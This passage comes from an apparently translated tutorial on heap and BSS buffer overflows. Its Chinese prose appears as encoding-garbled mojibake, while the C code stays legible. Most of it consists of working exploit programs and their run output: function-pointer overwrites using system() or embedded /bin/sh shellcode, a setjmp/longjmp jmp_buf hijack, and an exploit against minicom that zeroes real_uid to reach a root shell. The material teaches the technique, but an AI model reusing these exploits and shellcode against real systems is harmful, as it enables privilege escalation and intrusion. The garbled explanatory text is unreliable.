- │ú╙├╥╗╨⌐íú
-
- ┴φ═Γ╡─╥╗╓╓╖╜╖¿╩╟╝≥╡Ñ╡╪▓┬▓Γ╥╗╕÷║»╩²ú¿▒╚╚τsystem())╡─╡╪╓╖íú╚τ╣√╬╥├╟╓¬╡└╣Ñ╗≈│╠╨≥╓╨
- system()╡─╡╪╓╖ú¼─╟├┤▒╗╣Ñ╗≈╡─│╠╨≥╓╨system()╡─╡╪╓╖╙ª╕├╙δ╞Σ╧α▓ε▓╗╘▒ú¼╝┘╔Φ┴╜╕÷│╠╨≥
- ╘┌═¼╤∙╡─╟Θ┐÷╧┬▒α╥δ╡─╗░íú╒Γ╓╓╖╜╖¿╡─║├┤ª╘┌╙┌╦ⁿ▓╗╨Φ╥¬╥╗╕÷┐╔╓┤╨╨╡─heapíú
- (┴φ═Γ╥╗╓╓╖╜╖¿╩╟╩╣╙├PLT(╣²│╠┴┤╜╙▒φú⌐ú¼╒Γ└∩╛═▓╗╘┘╧Ω╩÷┴╦ú¼╙╨╨╦╚ñ╡─┐╔╥╘┐┤stranJer╫÷
- ╡─╚╞╣²▓╗┐╔╓┤╨╨╢╤╒╗╡─╣Ñ╗≈ú⌐
-
-
- ╡┌╢■╓╓╖╜╖¿╡─╙┼╡π╛═╩╟╝≥╡Ñíú╬╥├╟┐╔╥╘║▄┐∞╡├┤╙╣Ñ╗≈│╠╨≥╡─system()╡─╡╪╓╖▓┬│÷╙╨╚⌡╡π│╠
- ╨≥╡─system()╡╪╓╖íú╢°╟╥╘┌╘╢│╠╧╡═│╓╨╥▓╩╟╧α═¼╡─ú¿╚τ╣√░µ▒╛ú¼▓┘╫≈╧╡═│║═╙▓╝■╜ß╣╣╢╝╥╗
- ╤∙╡─╗░)íú╡┌╥╗╓╓╖╜╖¿╡─╙┼╡π╘┌╙┌╬╥├╟┐╔╥╘└√╙├╫╘╝║╡─shellcode└┤╫÷╚╬╥Γ╡─╩┬ú¼╢°╟╥▓ó▓╗
- ╨Φ╥¬┐╝┬╟║»╩²╓╕╒δ╡─╝µ╚▌╬╩╠Γú¼▒╚╚τ▓╗╣▄╩╟char (*funcptr)(int a)╗╣╩╟void
- (*funcptr)
- ()ú¼╢╝┐╔╥╘╦│└√╣ñ╫≈ú¿╡┌╥╗╓╓╖╜╖¿╛═▒╪╨δ┐╝┬╟╒Γ╨⌐ú⌐íú╦ⁿ╡─╚▒╡π╛═╩╟▒╪╨δ╥¬╙╨┐╔╓┤╨╨╡─heap
- /stack.
-
- ╧┬├µ╬╥├╟╘┘└┤┐┤╥╗╕÷╙╨╚⌡╡π╡─│╠╨≥:
- -----------------------------------------------------------------------------
- /*
- * Just the vulnerable program we will exploit.
- * Compile as: gcc -o vulprog vulprog.c (or change exploit macros)
- */
-
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <string.h>
-
- #define ERROR -1
- #define BUFSIZE 64
-
- int goodfunc(const char *str); /* ╒²│ú╟Θ┐÷╧┬╥¬▒╗funcptr╓╕╧≥╡─║»╩² */
-
- int main(int argc, char **argv)
- {
- static char buf[BUFSIZE];
- static int (*funcptr)(const char *str);/*
- ╒Γ╕÷╛═╩╟╬╥├╟╜½╥¬╓╪╨┤╡─║»╩²╓╕╒δ */
-
- if (argc <= 2)
- {
- fprintf(stderr, "Usage: %s <buf> <goodfunc arg>\n", argv[0]);
- exit(ERROR);
- }
-
- printf("(for 1st exploit) system() = %p\n", system);
- printf("(for 2nd exploit, stack method) argv[2] = %p\n", argv[2]);
- printf("(for 2nd exploit, heap offset method) buf = %p\n\n", buf);
-
- funcptr = (int (*)(const char *str))goodfunc;
- printf("before overflow: funcptr points to %p\n", funcptr);
-
- memset(buf, 0, sizeof(buf));
- /* ╥τ│÷╙╨┐╔─▄╘┌╒Γ└∩╖ó╔·ú¼╒Γ╥▓╩╟║▄│ú╝√╡─╥╗╓╓┤φ╬≤╡─╩╣╙├strncpy╡─└²╫╙ */
- strncpy(buf, argv[1], strlen(argv[1]));
- printf("after overflow: funcptr points to %p\n", funcptr);
-
- (void)(*funcptr)(argv[2]); /* ╒²│ú╟Θ┐÷╧┬╜½╡≈╙├goodfunc,▓╬╩²╬¬argv[2]
- */
- return 0;
- }
-
- /* ---------------------------------------------- */
-
- /* This is what funcptr would point to if we didn't overflow it */
- int goodfunc(const char *str)
- {
- printf("\nHi, I'm a good function. I was passed: %s\n", str);
- return 0;
- }
- -----------------------------------------------------------------------------
- ╬╥├╟└┤┐┤┐┤╡┌╥╗╕÷╣Ñ╗≈╡─└²╫╙ú¼╒Γ└∩▓╔╙├╡─╩╟╩╣╙├system()╡─╖╜╖¿ú║
- -----------------------------------------------------------------------------
- /*
- * Copyright (C) January 1999, Matt Conover & WSD
- *
- * ╤▌╩╛╘┌bss╢╬(╬┤▒╗│⌡╩╝╗»╡─╩²╛▌ú⌐╓╨╕▓╕╟╛▓╠¼║»╩²╓╕╒δ╡─╖╜╖¿íú
- *
- * Try in the offset (argv[2]) in the range of 0-20 (10-16 is best)
- * To compile use: gcc -o exploit1 exploit1.c
- */
-
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <string.h>
-
- /* ╝┘╔Φfuncptr╙δbuf╓«╝Σ╡─╛α└δú¿╢╘╙┌BSS╟°└┤╦╡ú¼╒Γ╕÷╓╡╙ª╕├╛═╩╟buf╡─┤≤╨í */
- #define BUFSIZE 64
-
- #define VULPROG "./vulprog" /* ╙╨╚⌡╡π│╠╨≥╡─╬╗╓├ */
- #define CMD "/bin/sh" /* ╢¿╥σ╚τ╣√╣Ñ╗≈│╔╣ª║≤╥¬╓┤╨╨╡─├ⁿ┴ε */
-
- #define ERROR -1
-
- int main(int argc, char **argv)
- {
- register int i;
- u_long sysaddr;
- static char buf[BUFSIZE + sizeof(u_long) + 1] = {0};
-
- if (argc <= 1)
- {
- fprintf(stderr, "Usage: %s <offset>\n", argv[0]);
- fprintf(stderr, "[offset = estimated system() offset]\n\n");
-
- exit(ERROR);
- }
-
- sysaddr = (u_long)&system - atoi(argv[1]); /* ╝╞╦πsystem()╡─╡╪╓╖ */
- printf("trying system() at 0x%lx\n", sysaddr);
-
- memset(buf, 'A', BUFSIZE);
-
- /* ╘┌little endian╧╡═│╓╨ú¼╨Φ╥¬╜½╫╓╜┌╖┤╨≥┼┼┴╨ */
- for (i = 0; i < sizeof(sysaddr); i++)
- buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255;
-
- execl(VULPROG, VULPROG, buf, CMD, NULL);
- return 0;
- }
- -----------------------------------------------------------------------------
- ╡▒╬╥├╟╘╦╨╨╦ⁿ║≤ú¼╡├╡╜╧┬├µ╡─╜ß╣√ú║
-
- [warning3@testserver vulpkg2]$ ./exploit2 12
- Trying system() at 0x80483fc
- system()'s address = 0x80483fc
- before overflow: funcptr points to 0x80485fc
- after overflow: funcptr points to 0x80483fc
- bash$
-
- ╜╙╧┬└┤╡─└²╫╙╓╨╬╥├╟╙├┴╦stack║═heap╡─╖╜╖¿ú║
- -----------------------------------------------------------------------------
- /*
- * Copyright (C) January 1999, Matt Conover & WSD
- *
- * ╒Γ╤▌╩╛┴╦╚τ║╬╓╪╨┤╥╗╕÷╛▓╠¼║»╩²╓╕╒δ╩╣╞Σ╓╕╧≥╬╥├╟╠ß╣⌐╡─shellcode.
- * ╒Γ╓╓╖╜╖¿╥¬╟≤┐╔╓┤╨╨╡─stack╗≥heap
- *
- * ╒Γ╕÷│╠╨≥╓╨╙╨┴╜╕÷▓╬╩²:offset║═heap/stack. ╢╘╙┌stack╖╜╖¿└┤╦╡ú¼
- * offset╬¬╢╤╒╗╢Ñ╢╦╡╜(╙╨╚⌡╡π│╠╨≥╡─ú⌐argv[2]╡─╛α└δ.
- * ╢╘╙┌heap╖╜╖¿└┤╦╡ú¼offset╬¬heap╡─╢Ñ╢╦╡╜▒╗╕▓╕╟╡─ú¿╗≥╓╕╢¿╡─ú⌐buffer╓«╝Σ╡─
- * ╛α└δíú
- *
- * Try values somewhere between 325-345 for argv[] method, and 420-450
- * for heap.
- *
- * To compile use: gcc -o exploit2 exploit2.c
- */
-
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <string.h>
-
- #define ERROR -1
- #define BUFSIZE 64 /* estimated diff between buf/funcptr */
-
- #define VULPROG "./vulprog" /* where the vulprog is */
-
- char shellcode[] = /* just aleph1's old shellcode (linux x86) */
- "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0"
- "\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
- "\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
-
- u_long getesp()
- {
- __asm__("movl %esp,%eax"); /* ╡├╡╜╡▒╟░╢╤╒╗╢Ñ╢╦╡─╓╡ */
- }
-
- int main(int argc, char **argv)
- {
- register int i;
- u_long sysaddr;
- char buf[BUFSIZE + sizeof(u_long) + 1];
-
- if (argc <= 2)
- {
- fprintf(stderr, "Usage: %s <offset> <heap | stack>\n", argv[0]);
- exit(ERROR);
- }
-
- if (strncmp(argv[2], "stack", 5) == 0) /* ╩╣╙├╢╤╒╗╡─╖╜╖¿ */
- {
- printf("Using stack for shellcode (requires exec. stack)\n");
-
- sysaddr = getesp() + atoi(argv[1]); /* ╝╞╦πargv[2]╡─╡╪╓╖ */
- printf("Using 0x%lx as our argv[1] address\n\n", sysaddr);
-
- memset(buf, 'A', BUFSIZE + sizeof(u_long));
- }
-
- else /* ╩╣╙├heap╡─╖╜╖¿ */
- {
- printf("Using heap buffer for shellcode "
- "(requires exec. heap)\n");
-
- /* ╝╞╦π─┐▒Ωbuffer╡─╡╪╓╖(sbrk(0)╙├└┤╡├╡╜heap╡─╢Ñ╢╦╡╪╓╖) */
- sysaddr = (u_long)sbrk(0) - atoi(argv[1]);
- printf("Using 0x%lx as our buffer's address\n\n", sysaddr);
- /* ╝╞╦π╩╟╖±buf╙δfuncptr╓«╝Σ╡─╛α└δ▓╗╫π╥╘╖┼╧┬╬╥├╟╡─shellcode */
- /* ╚τ╣√╒Γ╢╬╛α└δ▒╚╜╧╨í╡─╗░ú¼╞Σ╩╡┐╔╥╘▓╔╙├┴φ═Γ╡─╖╜╖¿└┤╠ε│Σú║ */
- /* buf funcptr sysaddr
- /* [sysaddr|sysaddr|...][sysaddr][shellcode] */
-
- if (BUFSIZE + 4 + 1 < strlen(shellcode))
- {
- fprintf(stderr, "error: buffer is too small for shellcode "
- "(min. = %d bytes)\n", strlen(shellcode));
-
- exit(ERROR);
- }
-
- strcpy(buf, shellcode);
- memset(buf + strlen(shellcode), 'A',
- BUFSIZE - strlen(shellcode) + sizeof(u_long));
- }
-
- buf[BUFSIZE + sizeof(u_long)] = '\0';
-
- /* reverse byte order (on a little endian system) (ntohl equiv) */
- for (i = 0; i < sizeof(sysaddr); i++)
- buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255;
-
- execl(VULPROG, VULPROG, buf, shellcode, NULL);
- return 0;
- }
- -----------------------------------------------------------------------------
- ╧╚└┤┐┤┐┤╙├╢╤╒╗╡─╖╜╖¿ú║
- [warning3@testserver vulpkg3]$ ./exploit3 319 stack
- Using stack for shellcode (requires exec. stack)
- Using 0xbffffdf7 as our argv[1] address
-
- argv[1] = 0xbffffdf7
- buf = 0x8049820
-
- before: funcptr = 0x8048500
- after: funcptr = 0xbffffdf7
-
- bash$
-
- buf funcptr ╢╤╒╗╟°
- ╕▓╕╟╟░:[xxxxxx...xxxxxxx][0x08048500]
- ╡═╓╖ ------------------> ╕▀╓╖
- ╕▓╕╟║≤:[AAAAAA...AAAAAAA][0xbffffdf7] [shellcode]
- | ^
- |___________|
-
- ╧┬├µ╩╟╙├heap╡─╖╜╖¿:
- [warning3@testserver vulpkg3]$ ./exploit3 836 heap
- Using heap buffer for shellcode (requires exec. heap)
- Using 0x8049820 as our buffer's address
-
- argv[1] = 0xbffffdf7
- buf = 0x8049820
-
- before: funcptr = 0x8048500
- after: funcptr = 0x8049820
-
- bash$
-
- buf funcptr
- ╕▓╕╟╟░:[xxxxxxxxxxxxxxxx][0x08048500]
- ╡═╓╖ ------------------> ╕▀╓╖
- ╕▓╕╟║≤:[shellcodeAAA...A][0x8049820]
- ^
- |_0x8049820
-
-
- ┤╙╔╧├µ╡─└²╫╙┐╔╥╘┐┤│÷,╢╘╙┌═¼╥╗╓╓╬╩╠Γ,┐╔╥╘╙╨╝╕╓╓▓╗═¼╡─╣Ñ╗≈╩╓╖¿.╒Γ└∩╬╥├╟┴φ═Γ╘┘╜Θ
- ╔▄╥╗╓╓└α╨═╡─╣Ñ╗≈.╦ⁿ└√╙├┴╦setjmp║═longjmp║»╩².╒Γ┴╜╕÷║»╩²═¿│ú╙├└┤╘┌╥╗╨⌐╡═╜╫║»╩²
- ╓╨┤ª└φ╥╗╨⌐┤φ╬≤║═╓╨╢╧.setjmp(jmpbuf)╙├└┤▒ú┤µ╡▒╟░╡─╢╤╒╗╒╗╓í╡╜jmpbuf╓╨,longjmp
- (jmpbuf,val)╜½┤╙jmpbuf╓╨╗╓╕┤╢╤╒╗╒╗╓í,longjmp╓┤╨╨═Ω║≤,│╠╨≥╝╠╨°┤╙setjmp()╡─╧┬╥╗
- ╠⌡╙∩╛Σ┤ª╓┤╨╨,▓ó╜½val╫≈╬¬setjmp()╡─╖╡╗╪╓╡.jmpbuf╓╨▒ú┤µ╙╨╝─┤µ╞≈bx,si,di,bp,sp,pc
- ,╚τ╣√╬╥├╟─▄╘┌longjmp╓┤╨╨╥╘╟░╕▓╕╟╡⌠jmpbuf,╬╥├╟╛═─▄╓╪╨┤╝─┤µ╞≈pc.╥≥┤╦╡▒longjmp╗╓╕┤
- ▒ú┤µ╡─╢╤╒╗╒╗╓í║≤,│╠╨≥╛═┐╔─▄╠°╡╜╬╥├╟╓╕╢¿╡─╡╪╖╜╚Ñ╓┤╨╨.╓┴╙┌╠°╫¬╡╪╓╖,┐╔╥╘╩╟╢╤╒╗╓╨,
- ╥▓┐╔╥╘╩╟heap╓╨.╧╓╘┌╬╥├╟╥╘x86╧╡═│╬¬└²└┤╛▀╠σ╜Γ╩═╥╗╧┬.
- (╧┬├µ╡─┤·┬δ╘┌Redhat 6.0 ,2.2.5╧┬▒α╥δ═¿╣².╢╘╙┌╞Σ╦√╡─╧╡═│,╟δ▓╬┐╝setjmp.h└┤╨▐╕─
- ╧α╙ª╡─┤·┬δ)
- ╩╫╧╚╬╥├╟└┤┐┤╥╗╕÷╙╨╚⌡╡π╡─│╠╨≥:
- -----------------------------------------------------------------------------
- /*
- * This is just a basic vulnerable program to demonstrate
- * how to overwrite/modify jmp_buf's to modify the course of
- * execution.
- */
-
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <string.h>
- #include <setjmp.h>
-
- #define ERROR -1
- #define BUFSIZE 16
-
- static char buf[BUFSIZE];
- jmp_buf jmpbuf; /* jmpbuf╩╟╬╥├╟╧δ╥¬╕▓╕╟╡─ */
-
- u_long getesp()
- {
- __asm__("movl %esp,%eax"); /* ╡├╡╜╡▒╟░╢╤╒╗╓╕╒δ */
- }
-
- int main(int argc, char **argv)
- {
- u_long diff;
- if (argc <= 1)
- {
- fprintf(stderr, "Usage: %s <string1> <string2>\n");
- exit(ERROR);
- }
- diff=(u_long)jmpbuf-(u_long)buf;
- printf("diff=%d\n",diff);
- printf("[vulprog] argv[2] = %p\n", argv[2]);
- printf("[vulprog] sp = 0x%lx\n\n", getesp());
-
- if (setjmp(jmpbuf)) /*
- ╚τ╣√┤≤╙┌0,─╟├┤longjmp()╙ª╕├╥╤╛¡╓┤╨╨═Ω▒╧┴╦.╓▒╜╙╓┤╨╨setjmp╙ª╕├╖╡╗╪1 */
- {
- fprintf(stderr, "error: exploit didn't work\n");
- exit(ERROR);
- }
- /* ╬╥├╟┤≥╙í│÷╕▓╕╟╟░║≤jmpbuf╓╨▒ú┤µ╡─╝─┤µ╞≈╡─╓╡ */
- printf("before:\n");
- printf("bx = 0x%lx, si = 0x%lx, di = 0x%lx\n",
- jmpbuf->__jmpbuf[JB_BX], jmpbuf->__jmpbuf[JB_SI],
- jmpbuf->__jmpbuf[JB_DI]);
-
- printf("bp = %p, sp = %p, pc = %p\n\n",
- jmpbuf->__jmpbuf[JB_BP], jmpbuf->__jmpbuf[JB_SP],
- jmpbuf->__jmpbuf[JB_PC]);
-
- strncpy(buf, argv[1], strlen(argv[1])); /* ╒Γ└∩┐╔─▄╡╝╓┬jmpbuf▒╗╕▓╕╟ */
-
- printf("after:\n");
- printf("bx = 0x%lx, si = 0x%lx, di = 0x%lx\n",
- jmpbuf->__jmpbuf[JB_BX], jmpbuf->__jmpbuf[JB_SI],
- jmpbuf->__jmpbuf[JB_DI]);
-
- printf("bp = %p, sp = %p, pc = %p\n\n",
- jmpbuf->__jmpbuf[JB_BP], jmpbuf->__jmpbuf[JB_SP],
- jmpbuf->__jmpbuf[JB_PC]);
-
- longjmp(jmpbuf, 1);
- return 0;
- }
- -----------------------------------------------------------------------------
-
- ╘┌╔╧├µ╡─│╠╨≥╓╨╬╥├╟┤≥╙í│÷╝─┤µ╞≈╡─╓╡,╩╟╬¬┴╦┐┤╡├╕ⁿ╟σ│■╥╗╨⌐,▓┬▓Γ╞≡└┤╥▓╕ⁿ╚▌╥╫.:-)
-
- ╧┬├µ╬╥├╟╕°│÷╣Ñ╗≈│╠╨≥.╦ⁿ└√╙├argv[]┤ó┤µ┤·┬δ,│╠╨≥╨Φ╥¬╠°╡╜env┤ª╓┤╨╨,╨Φ╥¬┐╔╓┤╨╨╢╤╒╗.
-
- -----------------------------------------------------------------------------
-
- /*
- * Copyright (C) January 1999, Matt Conover & w00w00 Security Development
- *
- * ╒Γ╕÷│╠╨≥╙├└┤╤▌╩╛═¿╣²╕▓╕╟jmpbuf(setjmp/longjmp)└┤╘┌heap╓╨─ú─Γ╢╤╒╗╥τ│÷╡─╖╜╖¿
- * ╬╥├╟╜½╕▓╕╟jmpbuf╓╨▒ú┤µ╡─sp/pc╝─┤µ╞≈╓╡.╡▒longjmp()▒╗╡≈╙├╡─╩▒║≥,╦ⁿ╜½┤╙╒Γ╕÷╡╪
- * ╓╖┐¬╩╝╓┤╨╨╧┬╥╗╠⌡╓╕┴ε.╦∙╥╘,╚τ╣√╬╥├╟─▄╜½┤·┬δ┤µ┤ó╘┌╒Γ╕÷╡╪╓╖,─╟╦ⁿ╛═╜½▒╗╓┤╨╨
- *
- * This takes two arguments (offsets):
- * arg 1 - stack offset (should be about 25-45).
- * arg 2 - argv offset (should be about 310-330).
- */
-
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <string.h>
-
- #define ERROR -1
- #define BUFSIZE 36
-
- #define VULPROG "./vulprog4"
-
- char shellcode[] = /* just aleph1's old shellcode (linux x86) */
- "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0"
- "\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
- "\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
-
- u_long getesp()
- {
- __asm__("movl %esp,%eax"); /* the return value goes in %eax */
- }
-
- int main(int argc, char **argv)
- {
- int stackaddr, argvaddr;
- register int index, i, j;
-
- char buf[BUFSIZE + 24 + 1];
-
- if (argc <= 1)
- {
- fprintf(stderr, "Usage: %s <stack offset> <argv offset>\n",
- argv[0]);
-
- fprintf(stderr, "[stack offset = offset to stack of vulprog\n");
- fprintf(stderr, "[argv offset = offset to argv[2]]\n");
-
- exit(ERROR);
- }
-
- stackaddr = getesp() - atoi(argv[1]);
- argvaddr = getesp() + atoi(argv[2]);
-
- printf("trying address 0x%lx for argv[2]\n", argvaddr);
- printf("trying address 0x%lx for sp\n\n", stackaddr);
-
- /*
- * The second memset() is needed, because otherwise some values
- * will be (null) and the longjmp() won't do our shellcode.
- */
-
- memset(buf, 'A', BUFSIZE), memset(buf + BUFSIZE, 0x1, 12);
- buf[BUFSIZE+24] = '\0';
-
- /* ------------------------------------- */
-
- /*
- * ╡▒╔Φ╓├pc╓╕╧≥╬╥├╟╡─shellcode╡╪╓╖╩▒,╬╥├╟╗ß╕▓╕╟jmpbuf╓╨╡─ebp/esp,
- * ╦∙╥╘,╬╥├╟╜½╙├╒²╚╖╡─╓╡╓╪╨┤╦ⁿ├╟.
- */
-
- for (i = 0; i < sizeof(u_long); i++) /* setup BP */
- {
- index = BUFSIZE + 12 + i;
- buf[index] = (stackaddr >> (i * 8)) & 255;
- }
-
- /* ----------------------------- */
-
- for (i = 0; i < sizeof(u_long); i++) /* setup SP */
- {
- index = BUFSIZE + 16 + i;
- buf[index] = (stackaddr >> (i * 8)) & 255;
- }
-
- /* ----------------------------- */
-
- for (i = 0; i < sizeof(u_long); i++) /* setup PC */
- {
- index = BUFSIZE + 20 + i;
- buf[index] = (argvaddr >> (i * 8)) & 255;
- }
-
- execl(VULPROG, VULPROG, buf, shellcode, NULL);
- return 0;
- }
- -----------------------------------------------------------------------------
- ╬╥├╟└┤┐┤╥╗╧┬╓┤╨╨╡─╜ß╣√:
- [warning3@testserver vulpkg4]$ ./exploit4 20 393
- trying address 0xbffffe49 for argv[2]
- trying address 0xbffffcac for sp
-
- diff=36
- [vulprog] argv[2] = 0xbffffe49
- [vulprog] sp = 0xbffffcac
-
- before:
- bx = 0x401041b4, si = 0xbffffd04, di = 0x3
- bp = 0xbffffcb8, sp = 0xbffffcac, pc = 0x80485c9
-
- after:
- bx = 0x1010101, si = 0x1010101, di = 0x1010101
- bp = 0xbffffcac, sp = 0xbffffcac, pc = 0xbffffe49
-
- bash$
-
-
-
- ╬╥├╟╥╤╛¡┐┤╡╜ú¼╘┌╒Γ╨⌐└²╫╙╓╨ú¼heap╟°╡─╥τ│÷┐╔╥╘╡╝╓┬║▄┤≤╡─░▓╚½╬╩╠Γíú╢°╘┌╒µ╩╡╡─╗╖╛│
- ╓╨ú¼heap╟°╡─├⌠╕╨╩²╛▌╥▓┐╔─▄▒╗╕▓╕╟íú└²╚τú║
-
- ║»╩² ╘¡╥≥
- 1. *gets()/*printf(), *scanf() __iob (FILE)╜ß╣╣┤ó┤µ╘┌heap
- 2. popen() __iob (FILE)╜ß╣╣┤ó┤µ╘┌heap
- 3. *dir() (readdir, seekdir, ...) DIR ╜ß╣╣ (dir/heap buffers)
- 4. atexit() ╛▓╠¼/╚½╛╓║»╩²╓╕╒δ
- 5. strdup() ╘┌heap╟°╢»╠¼╖╓┼Σ╩²╛▌
- 7. getenv() ┤ó┤µ╩²╛▌╘┌heap╟°
- 8. tmpnam() ┤ó┤µ╩²╛▌╘┌heap╟°
- 9. malloc() ┴┤╓╕╒δ
- 10. rpc callback ║»╩² ║»╩²╓╕╒δ
- 11. windows callback ║»╩² ║»╩²╓╕╒δ▒ú┤µ╘┌heap╟°
- 12. signal handler pointers
- ║»╩²╓╕╒δ(╫ó╥Γú║unix╘┌─┌║╦╓╨╕·╫┘╒Γ╨⌐╨┼║┼ú¼
- in cygnus (gcc for win), ╢°▓╗╩╟╘┌heap╓╨)
-
- printf(),fget(),readir(),seekdir()╡╚║»╩²╬¬FILE╜ß╣╣╘┌heap╓╨╖╓┼Σ╡─┐╒╝Σ┐╔╥╘▒╗╓╪╨┤íú
- atexit()╡─║»╩²╓╕╒δ╜½╘┌│╠╨≥╓╨╢╧╩▒▒╗╡≈╙├íústrdup()╗ß╜½╫╓╖√┤«(╚τ╬─╝■├√ú¼┐┌┴ε╡╚╡╚)
- ┤ó┤µ╘┌heap╟°íúmalloc()╡─┴┤╓╕╒δ─▄▒╗╙├└┤╖╟╖¿╖├╬╩─┌┤µíúgetenv()╜½╩²╛▌┤ó┤µ╘┌heap╓╨ú¼
- ╘╩╨φ╬╥├╟╨▐╕─$HOME╡╚▒Σ┴┐íúsvc/rpc╫ó▓ß║»╩²(librpc,libnsl╡╚╡╚)╜½╗╪╜╨║»╩²╓╕╒δ┤ó┤µ╘┌
- heap╓╨.
-
- ╧╓╘┌╬╥├╟└┤┐┤╥╗╕÷╒µ╩╡╡─└²╫╙íú░µ▒╛╡═╙┌1.81.1╡─minicom╙╨▓╗╔┘╗║│σ╟°╥τ│÷╡─┬⌐╢┤íú
- ╞Σ╓╨╥╗╕÷╩╟:
- case 't': /* Terminal type */
- ╥τ│÷ ---> strcpy(termtype, optarg);
- #ifdef __linux__
- /* Bug in older libc's (< 4.5.26 I think) */
- if ((s = getenv("TERMCAP")) != NULL && *s != '/')
- unsetenv("TERMCAP");
- #endif
- termtype╩╟static╨═╡─╩²╫Θú¼╥▓╛═╩╟╘┌BSS╟°íú╧╓╘┌╬╥├╟┐┤┐┤╩╟╖±╒Γ┐Θ─┌┤µ╓╨╙╨╩▓├┤╓╪╥¬
- ╡─╢½╬≈íú╘┌minicom.h╓╨ú¼╬╥├╟┐┤╡╜┴╦:
-
- EXTERN int real_uid; /* ╒µ╩╡╡─╙├╗ºid */
- EXTERN int real_gid; /* ╒µ╩╡╡─╫Θid */
- EXTERN int eff_uid; /* ╙╨╨º╡─╙├╗ºid */
- EXTERN int eff_gid; /* ╙╨╨º╡─╫Θid */
- ╚τ╣√╬╥├╟─▄╣╗╨▐╕─real_uid,─╟╬╥├╟╛═┐╔─▄╗±╡├root╡─╠╪╚¿íú╧╚╚├╬╥├╟┐┤┐┤
- ╦ⁿ└δtermtype╙╨╢α╘▒ú¼╬╥├╟╘┌minicom.c╓╨▓σ╚δ╥╗╨╨┤·┬δú║
-
- printf ("real_uid is at: %x\n"
- "termtype is at: %x\n", &real_uid,termtype);
-
- ╩Σ│÷╜ß╣√╚τ╧┬:
- real_uid is at: 80664b4
- termtype is at: 8066480
-
- ║▄║├ú¼real_uid╡─╡╪╓╖▒╚termtype╕▀52╕÷╫╓╜┌.╬╥├╟╓╗╥¬╜½╡┌53,54,55,56╫╓╜┌╕│╬¬0╝┤┐╔.
- ╡½╫╓╖√┤«╓╨╓╗╙╨╫ε║≤╥╗╕÷╫╓╜┌(╓╒╓╣╖√)▓┼─▄╬¬0ú¼╦∙╥╘╬╥├╟▓╗╡├▓╗╓┤╨╨4┤╬╕▓╕╟íú
- getopg()┐╔╥╘╓╪╕┤╡─╢┴╚í╥╗╕÷▓╬╩²(╒Γ└∩╩╟
- -t),╥≥┤╦╬╥├╟╧╚╚├╦ⁿ╢┴╚ítermtype+55│ñ╡─╫╓
- ╖√┤«,╒Γ╜½╩╣realid╡─╫ε║≤╥╗╕÷╫╓╜┌╬¬0íú╚╗║≤╥└┤╬╙├termtype+54,termtype+53,termtyp
- e+52└┤╕▓╕╟íú╒Γ╤∙╛═╗ß╩╣realid╡─╦─╕÷╫╓╜┌╢╝▒Σ│╔0┴╦íú
-
- ----------------------------------------------------------------------------
- #include <stdio.h>
- #include <string.h>
- #include <unistd.h>
-
- #define OFFSET 52
-
- /* if you figure this out, you could try defining it */
- //#define UTTY "/dev/ttyp0"
-
- char * makestring (int ch, int len)
- {
- static char b[500];
- int i;
-
- for (i=0 ; i<len ; i++)
- {
- b[i] = ch;
- }
- b[i] = 0;
- return b;
- }
-
- int main (int argc, char **argv)
- {
- char bleh[4][60];
-
- strcpy (bleh[0],makestring(255,OFFSET+3));/*
- ╬¬┴╦╕▓╕╟termtype+55┤ª╡─╫╓╜┌*/
- strcpy (bleh[1],makestring(255,OFFSET+2));/*
- ╬¬┴╦╕▓╕╟termtype+54┤ª╫╓╜┌*/
- strcpy (bleh[2],makestring(255,OFFSET+1));/*
- ╬¬┴╦╕▓╕╟termtype+53┤ª╫╓╜┌*/
- strcpy (bleh[3],makestring(255,OFFSET)); /*
- ╬¬┴╦╕▓╕╟termtype+52┤ª╫╓╜┌*/
-
- #ifdef UTTY
- execl ("/usr/bin/minicom","minicom",
- "-t",bleh[0],"-t",bleh[1],
- "-t",bleh[2],"-t",bleh[3],
- "-t","vt100","-s",
- "-p",UTTY,NULL);
- #else
- execl ("/usr/bin/minicom","minicom",
- "-t",bleh[0],"-t",bleh[1],
- "-t",bleh[2],"-t",bleh[3],
- "-t","vt100",
- "-s",NULL);
- #endif
- return 0;
- }
- -------------------------------------------------------------------------------
-
- ╦∙╥╘╧╓╘┌real_uid▒Σ│╔┴╦0x00000000 (root)
- ╬╥├╟┐╔╥╘═¿╣²minicom└┤╓┤╨╨╥╗╕÷root
- shell.╘┌╓┤╨╨┴╦╔╧╩÷┤·┬δ╥╘║≤ú¼─π╗ß╖ó╧╓minicom
- ╡─╧╘╩╛▒Σ│╔┬╥╫╓╖√┴╦íú╬╥├╟┐╔╥╘╘┌┴φ╥╗╕÷╓╒╢╦╓╪╨┬╞≡╥╗╕÷minicom,┐┤╥╗╧┬╦ⁿ╡─▓╦╡Ñú¼╤í╘±
- `Filenames and paths':
-
- A - Download directory : /tmp
- B - Upload directory :
- C - Script directory :
- D - Script program : runscript
- E - Kermit program : /usr/bin/kermit
- Change which setting?
-
- ╬╥├╟╓╗╥¬╜½`E- Kermit program'
- ╓╨╡─/usr/bin/kermit╕─│╔/bin/bash,╬╥├╟╛═┐╔╥╘╗±╡├
- ╥╗╕÷root shell┴╦íú╟╨╗╗╗╪╘¡╧╚╡─╓╒╢╦ú¼╨▐╕─'E'╧εú¼╚╗║≤░┤CTRL+A+K╞⌠╢»kermit,
- bash#
-
- ╒Γ╩╟heap/BSS╥τ│÷╡─╥╗╕÷╩╡└²íú╒Γ╤∙╡─└²╫╙╒²╘┌╓≡╜Ñ╡╪╘÷╝╙ú¼╟░▓╗╛├CERT╣½▓╝╡─wuftp
- 2.
